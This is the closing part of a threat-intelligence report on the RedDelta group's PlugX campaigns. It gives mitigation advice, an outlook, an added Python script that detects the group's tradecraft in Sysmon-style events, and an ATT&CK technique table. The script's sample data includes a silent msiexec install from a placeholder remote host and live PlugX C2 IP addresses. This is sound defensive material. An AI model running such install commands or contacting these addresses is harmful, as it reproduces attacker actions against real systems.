- [Install the Recorded Future Threat Intelligence Browser Extension](https://www.recordedfuture.com/platform/browser-extension) to get instant access to threat intelligence from any web-based resource. The extension enables users to process alerts faster within their security information and event management (SIEM) tooling and to prioritize vulnerabilities for patching.
- Review public guidance on mitigating common TTPs used by Chinese state-sponsored groups ([1](https://www.cisa.gov/news-events/cybersecurity-advisories/aa22-158a), [2](https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-144a), [3](https://media.defense.gov/2019/Oct/07/2002191601/-1/-1/0/Mitigating%20Recent%20VPN%20Vulnerabilities%20-%20Copy.pdf), [4](https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-258a)). Review Insikt Group’s report “[Charting China’s Climb as a Leading Global Cyber Power](https://www.recordedfuture.com/charting-chinas-climb-leading-global-cyber-power)” for trends and recommendations for mitigating Chinese advanced persistent threat (APT) activity more broadly.

## Outlook

Insikt Group anticipates that RedDelta will continue to target organizations worldwide with its customized PlugX backdoor, focusing on Southeast Asia and China’s periphery (Mongolia and Taiwan). RedDelta will likely continue to target governments, religious organizations, NGOs, and activists. As demonstrated in this report, RedDelta has continually evolved its infection chain and is expected to keep doing so, in close proximity to or in anticipation of major geopolitical developments.
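The tradecraft described in this report (a remotely hosted MSI installed via msiexec, MSC files opened with mmc.exe from a user-writable location, the imecmnt.exe sideloading triad, and connections to the named PlugX C2 IPs) maps directly onto host and network telemetry. The following Python is an added example and is not Insikt Group's Sigma or YARA rules from Appendix C; it runs four detection rules over constructed Sysmon-style events. All paths, the `hosting.example` download host, and the `loader-placeholder.dll` name are assumptions; the file names Adobe-Setup.msi, Meeting Invitation.msc and imecmnt.exe and the C2 IPs come from the report.

```python
"""Detection logic for the RedDelta tradecraft described in this report, as an
added example (not Insikt Group's Appendix C rules). It runs over constructed
Sysmon-style events and fires four rules:

  R1  msiexec.exe installing an MSI from a remote URL            (T1218.007)
  R2  mmc.exe opening an .msc that sits in a user-writable path  (T1218.014)
  R3  an unsigned DLL loaded from the directory of an EXE that
      runs outside Windows / Program Files (sideloading triad)   (T1574.001)
  R4  an outbound connection to a PlugX C2 IP named in the report
"""
import re

# C2 IPs quoted (defanged) in the report body; refanged here for matching.
PLUGX_C2 = {
    ioc.replace("[.]", ".")
    for ioc in ("103.238.227[.]183", "103.238.225[.]248", "116.206.178[.]67")
}

# The only legitimate sideloading host this report names.
SIDELOAD_HOSTS = {"imecmnt.exe"}

# Locations a mail attachment or browser download would normally be run from.
USER_WRITABLE = re.compile(
    r"^[a-z]:\\(users\\[^\\]+\\(downloads|appdata|desktop|documents)"
    r"|windows\\temp|programdata)\\",
    re.IGNORECASE,
)
TRUSTED_ROOTS = re.compile(r"^[a-z]:\\(windows|program files( \(x86\))?)\\", re.IGNORECASE)
REMOTE_URL = re.compile(r"\bhttps?://", re.IGNORECASE)
# Captures drive-rooted .msc paths from a command line, quoted or not.
MSC_ARG = re.compile(r'"?([a-z]:\\[^"]+?\.msc)"?', re.IGNORECASE)


def _base(path):
    return path.rsplit("\\", 1)[-1].lower()


def _dir(path):
    return path.rsplit("\\", 1)[0].lower()


def check_event(ev):
    """Return the names of the rules that fire on a single event."""
    hits = []
    kind = ev["event"]
    if kind == "process_create":
        image, cmdline = ev["image"], ev.get("cmdline", "")
        if _base(image) == "msiexec.exe" and REMOTE_URL.search(cmdline):
            hits.append("R1_remote_msi")
        if _base(image) == "mmc.exe":
            if any(USER_WRITABLE.match(p) for p in MSC_ARG.findall(cmdline)):
                hits.append("R2_msc_from_user_path")
    elif kind == "image_load":
        image, dll = ev["image"], ev["loaded"]
        same_dir = _dir(image) == _dir(dll)
        if same_dir and not ev.get("signed", False) and not TRUSTED_ROOTS.match(image):
            hits.append("R3_sideload_candidate")
            if _base(image) in SIDELOAD_HOSTS:
                hits.append("R3_known_sideload_host")
    elif kind == "network_connect":
        if ev["dst_ip"] in PLUGX_C2:
            hits.append("R4_plugx_c2")
    return hits


def scan(events):
    """Map event index -> fired rules, omitting events with no hits."""
    results = {}
    for i, ev in enumerate(events):
        hits = check_event(ev)
        if hits:
            results[i] = hits
    return results


# Constructed sample telemetry. Paths, the user name, the download host and the
# loader DLL name are hypothetical (the report gives only the loader's SHA256);
# the file names and the C2 IP come from the report.
SAMPLE_EVENTS = [
    {"event": "process_create", "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": r"msiexec.exe /i https://hosting.example/Adobe-Setup.msi /qn"},
    {"event": "process_create", "image": r"C:\Windows\System32\mmc.exe",
     "cmdline": r'"C:\Windows\System32\mmc.exe" "C:\Users\alice\Downloads\Meeting Invitation.msc"'},
    {"event": "image_load", "image": r"C:\Users\alice\AppData\Roaming\OfficeIME\imecmnt.exe",
     "loaded": r"C:\Users\alice\AppData\Roaming\OfficeIME\loader-placeholder.dll", "signed": False},
    {"event": "network_connect", "image": r"C:\Users\alice\AppData\Roaming\OfficeIME\imecmnt.exe",
     "dst_ip": "103.238.227.183", "dst_port": 443},
    # Benign: an administrator opening a built-in console, a local MSI install,
    # and a signed helper DLL loaded from Program Files.
    {"event": "process_create", "image": r"C:\Windows\System32\mmc.exe",
     "cmdline": r"mmc.exe C:\Windows\System32\eventvwr.msc"},
    {"event": "process_create", "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": r"msiexec.exe /i C:\Users\alice\Downloads\vendor-setup.msi"},
    {"event": "image_load", "image": r"C:\Program Files\Vendor\app.exe",
     "loaded": r"C:\Program Files\Vendor\app-helper.dll", "signed": True},
]

if __name__ == "__main__":
    for idx, rules in scan(SAMPLE_EVENTS).items():
        print(idx, SAMPLE_EVENTS[idx]["event"], ", ".join(rules))
```

Run it directly to print the rules fired by each sample event; the three benign events produce no hits. R3 is the noisy rule in practice, since many legitimate installers run from AppData with unsigned helper DLLs, so it is better treated as a scoring signal, with the known-host variant promoted to an alert and paired with the Appendix C hashes for confirmation.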
## Appendix A — Indicators of Compromise

## Appendix B — MITRE ATT&CK Techniques

|Tactic: Technique|ATT&CK Code|
|---|---|
|Resource Development: Acquire Infrastructure — Virtual Private Server|T1583.003|
|Resource Development: Acquire Infrastructure — Domains|T1583.001|
|Initial Access: Phishing — Spearphishing Attachment|T1566.001|
|Initial Access: Phishing — Spearphishing Link|T1566.002|
|Execution: User Execution — Malicious File|T1204.002|
|Execution: Command and Scripting Interpreter — PowerShell|T1059.001|
|Persistence: Boot or Logon Autostart Execution — Registry Run Keys / Startup Folder|T1547.001|
|Defense Evasion: Hijack Execution Flow — DLL Search Order Hijacking|T1574.001|
|Defense Evasion: Execution Guardrails — Geofencing|T1627.001|
|Defense Evasion: Deobfuscate/Decode Files or Information|T1140|
|Defense Evasion: System Binary Proxy Execution — MMC|T1218.014|
|Defense Evasion: System Binary Proxy Execution — Msiexec|T1218.007|
|Defense Evasion: Masquerading — Match Legitimate Name or Location|T1036.005|
|Defense Evasion: Masquerading — Double File Extension|T1036.007|
|Discovery: System Information Discovery|T1082|
|Command-and-Control: Encrypted Channel — Symmetric Cryptography|T1573.001|
|Command-and-Control: Data Encoding — Standard Encoding|T1132.001|
|Command-and-Control: Web Service|T1102|

## Appendix C — YARA and Sigma Rules

_Recorded Future reporting contains expressions of likelihood or probability consistent with [US Intelligence Community Directive (ICD) 203: Analytic Standards](https://irp.fas.org/dni/icd/icd-203.pdf) (published January 2, 2015). Recorded Future reporting also uses [confidence level standards employed by the US Intelligence Community](https://www.dni.gov/files/ODNI/documents/assessments/ICA-declass-16MAR21.pdf) to assess the quality and quantity of the source information supporting our analytic judgments._

_About Insikt Group®_

_Recorded Future’s Insikt Group, the company’s threat research division, comprises analysts and security researchers with deep government, law enforcement, military, and intelligence agency experience. Their mission is to produce intelligence that reduces risk for customers, enables tangible outcomes, and prevents business disruption._

_About Recorded Future®_

_Recorded Future is the world’s largest threat intelligence company. Recorded Future’s Intelligence Cloud provides end-to-end intelligence across adversaries, infrastructure, and targets. Indexing the internet across the open web, dark web, and technical sources, Recorded Future provides real-time visibility into an expanding attack surface and threat landscape, empowering customers to act with speed and confidence to reduce risk and securely drive business forward. Headquartered in Boston with offices and employees around the world, Recorded Future works with over 1,800 businesses and government organizations across more than 75 countries to provide real-time, unbiased, and actionable intelligence._

_Learn more at recordedfuture.com_